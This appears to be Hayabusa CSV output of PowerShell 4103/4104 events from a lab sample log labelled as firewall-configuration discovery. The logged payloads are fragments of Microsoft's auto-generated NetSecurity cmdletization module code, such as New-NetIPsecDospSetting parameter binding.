[object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = 
${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPolicyChange ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecDospSetting ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if 
($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] 
${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
